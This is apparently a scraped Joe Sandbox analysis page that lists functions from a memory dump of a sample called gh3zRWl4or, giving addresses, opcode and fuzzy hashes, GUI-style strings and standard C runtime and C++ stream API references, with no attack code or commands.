Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID: #SCROLLX$#SCROLLY
API String ID: 0-350977493
Opcode ID: 397ffeaf7c2789e22e8512bf2d05284fd49d185ef52bdc1364574c939d58788f
Instruction ID: 3a9352855e342266107d3719d13d1e3cc499cb9ab16b4e03a299fd90a2dc69b2
Opcode Fuzzy Hash: 397ffeaf7c2789e22e8512bf2d05284fd49d185ef52bdc1364574c939d58788f
Instruction Fuzzy Hash: F412A633D28BC9C5E212DA3790821B9A750EF7E385F29DB22FD4576566EF24B0D18A00

Function 00007FF674160BA0 Relevance: 2.8, Strings: 2, Instructions: 314COMMON

Download Yara Rule

Strings

- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X , xrefs: 00007FF674160BDD
..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF674160BFC

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID: - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X $..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
API String ID: 0-4293514333
Opcode ID: a7d38f3f62ff8bfd67a45ae15bd1ff51b11bb5f0e607d24480194b862b9088d6
Instruction ID: ac279449fddcb50fabfc6f3762eb34a53b88bb1c387c68d328999cb1a022a88c
Opcode Fuzzy Hash: a7d38f3f62ff8bfd67a45ae15bd1ff51b11bb5f0e607d24480194b862b9088d6
Instruction Fuzzy Hash: 80D1F9237046D88AD754CF29D8D5A7C7B9AE794B02B4AC176CE89C27A1EF7AC445C310

Function 00007FF674165990 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

[x], xrefs: 00007FF674165E2C
[ ], xrefs: 00007FF674165E33

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID: [ ]$[x]
API String ID: 0-3323218928
Opcode ID: 7d1f5bebd3bdd2173c26a1258794a74af714770ce53c5b7c8410b9957697f27c
Instruction ID: c66eb23bdde0984a424f87243891a88622701bd54b408db9d344f6e7869a28d6
Opcode Fuzzy Hash: 7d1f5bebd3bdd2173c26a1258794a74af714770ce53c5b7c8410b9957697f27c
Instruction Fuzzy Hash: 6DE1BA33928B89C5E202DB3694451F9B350EF6E384F199731EE58665A5EF39E181CB00

Function 00007FF67417A6D0 Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FF67417A73C
VUUU, xrefs: 00007FF67417A722

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID: VUUU$VUUU
API String ID: 0-3149182767
Opcode ID: 94f68fb84e9e26c3f901f418bed6d1ac69c7780fc4c902d537ac8bd508fc21a0
Instruction ID: c6afd95a32336b50c32c2b09be77f258583542e0a1eac2672f008f6f1f3c845f
Opcode Fuzzy Hash: 94f68fb84e9e26c3f901f418bed6d1ac69c7780fc4c902d537ac8bd508fc21a0
Instruction Fuzzy Hash: C7C19833F10B48D9E301DB3A94815F9B361FBAA7C87159326FA0CB7665DF24A191DB80

Function 00007FF674159250 Relevance: 2.7, APIs: 2, Instructions: 214COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159352
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159592

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 094c4577826582de8072b8e25cab6100b37588a436b1f070e5cbc0b8248b82f4
Instruction ID: d1ccc85bb704d4ffdafdbf4edf82695d5c5dee8479c2cff6cc0b7d6d39a7b672
Opcode Fuzzy Hash: 094c4577826582de8072b8e25cab6100b37588a436b1f070e5cbc0b8248b82f4
Instruction Fuzzy Hash: F3910433A3968586DB51DB3AD1447B9B760FF9A785F14C732DE09A2665EF38E081CB00

Function 00007FF6741665D0 Relevance: 1.8, Strings: 1, Instructions: 508COMMON

Download Yara Rule

Strings

##Combo_%02d, xrefs: 00007FF674166CD2

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID: ##Combo_%02d
API String ID: 0-4250768120
Opcode ID: 86e125e50d47379d23e63026dd9fd58ba356b17d31c862a95a60beeedbcba928
Instruction ID: 5a3d531922a58c0bad3813116b2eccef94633497106d5c12abd471c82b83472e
Opcode Fuzzy Hash: 86e125e50d47379d23e63026dd9fd58ba356b17d31c862a95a60beeedbcba928
Instruction Fuzzy Hash: 8142D433A28B85C6E711DB36D0851F9B770FF99384F149331EA58666A5EF38E095CB00

Function 00007FF674162E50 Relevance: 1.7, APIs: 1, Instructions: 488COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF674163141

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 6aadec4f857d5d084191e53991da83ecc8b905e14562a21ad55b440e16278cf2
Instruction ID: 3f4c9ad53d5e5dde8fa1dc257c089fa348c21bae0850ad94d5a7129f8704d8e4
Opcode Fuzzy Hash: 6aadec4f857d5d084191e53991da83ecc8b905e14562a21ad55b440e16278cf2
Instruction Fuzzy Hash: ED426E72B14B85C6E710DF2AD4846A977B1FB88B84F159232DE4D97B24DF3AE445CB00

Function 00007FF67415A2F0 Relevance: 1.4, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF67415A34A

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 378f4455e9e26e8388d4f334d1afdd9bb43e036087f9d150b14874c7a3fd2b47
Instruction ID: 15e6991dfa88fcb834d9ce600241e85ab496855537d240253612a1e26b3f80ca
Opcode Fuzzy Hash: 378f4455e9e26e8388d4f334d1afdd9bb43e036087f9d150b14874c7a3fd2b47
Instruction Fuzzy Hash: B4614D6363C6E283D3565B3CA5892BDAED0B789388F1C9275FA8AC2B45CD3CD540C640

Function 00007FF67415A040 Relevance: 1.4, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF67415A0AA

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 9b73806cbc492d3e3f50a07f843d09ae469a58cafdc72022189914457e6024f1
Instruction ID: 9fb5fe5e2709372ab8f72e72521714632b35817b83f6a8a6940ef805c66a69f5
Opcode Fuzzy Hash: 9b73806cbc492d3e3f50a07f843d09ae469a58cafdc72022189914457e6024f1
Instruction Fuzzy Hash: 49610673B6C6E1C6D7158B38B449AB9FFA4E789388F098275DA8CC3A45DE2ED101C700

Function 00007FF67414F480 Relevance: 1.0, Instructions: 981COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b058f77c85996c0b3430052bb7bbe077e4bd92fd96da202169b27b6a568691a
Instruction ID: 81c43f07619edf8d4cac97c2151cadcf56c46e7c264d01ab88023f993f0e527a
Opcode Fuzzy Hash: 9b058f77c85996c0b3430052bb7bbe077e4bd92fd96da202169b27b6a568691a
Instruction Fuzzy Hash: A8B26633D28789C6E356AE3680C42F9B750EF59B8CF1D9735DE086A295EF3865C48B10

Function 00007FF674150E80 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 770b59ab0495df15d9417504e3538a6b35212834e34e299191476f775964e986
Instruction ID: be88fc883ac6c1854e36bd421ea129aa9fea049e9066445851e370d0ae50dbcb
Opcode Fuzzy Hash: 770b59ab0495df15d9417504e3538a6b35212834e34e299191476f775964e986
Instruction Fuzzy Hash: 4822D733E28785C6E753AE3690C52F9B790EF15B84F1A8735DE0DA7295EF28A4C4C610

Function 00007FF674158570 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3dabebd7bb958130e0a94b4efa8d972984d75d83799f2a0b86c621e863bf461
Instruction ID: ad62c3dd565ee6bf0ffdef0a6caf5307b886f76eba8e743d69d7c223cf1f0801
Opcode Fuzzy Hash: a3dabebd7bb958130e0a94b4efa8d972984d75d83799f2a0b86c621e863bf461
Instruction Fuzzy Hash: 44F19623D38B8D85E212A63754861F9F250AFBF384F1DEB22FD48B59B1DF2861D19600

Function 00007FF67414E680 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73c53623bd2a0969440657ea732904c6b443514a47c12ff5a2f219424bd0e784
Instruction ID: 706d39fcef1d8f8e8e38e0a37b03101930074c14df33aa4287c768d25e07c456
Opcode Fuzzy Hash: 73c53623bd2a0969440657ea732904c6b443514a47c12ff5a2f219424bd0e784
Instruction Fuzzy Hash: BED1A633C2879DC5E252A63B50C61B8B390AF7E3D9F1DDB32E948B21E1DF2975859600

Function 00007FF674150960 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762bf655720ca0e0ea74a3ee70b7a3f4346d3bdf29b0cc9da0aa969e6db57ae6
Instruction ID: 8e32f8cd514f190b9d412bc3c2745d57715a0c6f2d29bd5e0b547f48bc49fe84
Opcode Fuzzy Hash: 762bf655720ca0e0ea74a3ee70b7a3f4346d3bdf29b0cc9da0aa969e6db57ae6
Instruction Fuzzy Hash: 9DA1F973D2A24AC9E657A5B750CA3F8AF506F2A784F18CB36DE0CB6491EF2574D4C600

Function 00007FF674156ED0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6416da2f5b4f1d51f4e756dd382aec6323b1d20c255575b13c00517e6d870856
Instruction ID: bbe5ae01b49bbd5e27644c0cd7b63d0d0a6b9d3da8d132a676647bfc62f82343
Opcode Fuzzy Hash: 6416da2f5b4f1d51f4e756dd382aec6323b1d20c255575b13c00517e6d870856
Instruction Fuzzy Hash: 93A1AF33A28AD4CAE702DF7A90852FCBBB0BB49349F159335DE5562A65DF386581CB00

Function 00007FF674154820 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction ID: 4c6a413154730c4e9bb1ad7ab3da1830f28f5e4ebef60fe829c73ec9f10dff56
Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction Fuzzy Hash: 145128A76744B187DA509F2AD8C26BC7790E74AB43FE48076D658C2F91C93DC14ADF20

Function 00007FF674161690 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
Instruction ID: 0a30376e66a3c4d849d8475ba890b1a07df75a84d89c6a1836dab606c9b479f2
Opcode Fuzzy Hash: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
Instruction Fuzzy Hash: C241E533E5D359C5E521A62351C81796292AFAAB80F5EC732ED4CA7A84EF38F4819701

Function 00007FF67418C0B0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
Instruction ID: ef9a2ae243a979197d62f48ff2651bfd965327f71ede3a0cb5f9068dfdb7236f
Opcode Fuzzy Hash: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
Instruction Fuzzy Hash: 13416073B2154487E78CCE3AD856AAD33A6E399304F55C239EB0AC7385DF399906CB44

Function 00007FF6741424F0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e620470d19bf88a54e58a3ff6a60801cd6e360028fe19ccb035e9b9c1eaf177f
Instruction ID: 2bbc364abd6e34c13331e408ff91dec298d0297c7e33dc3e0ad681981107994f
Opcode Fuzzy Hash: e620470d19bf88a54e58a3ff6a60801cd6e360028fe19ccb035e9b9c1eaf177f
Instruction Fuzzy Hash: 2E310437734A5687EB488638E936B782691E345384FC9A539EE5AC66C2EF3DD4508700

Function 00007FF674173420 Relevance: 99.2, APIs: 66, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.VCRUNTIME140 ref: 00007FF674173450

Part of subcall function 00007FF6741894E0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF67418951B
Part of subcall function 00007FF6741894E0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF67418953A
Part of subcall function 00007FF6741894E0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF67418956C
Part of subcall function 00007FF6741894E0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189587
Part of subcall function 00007FF6741894E0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6741895D3

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF67417346F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417347F
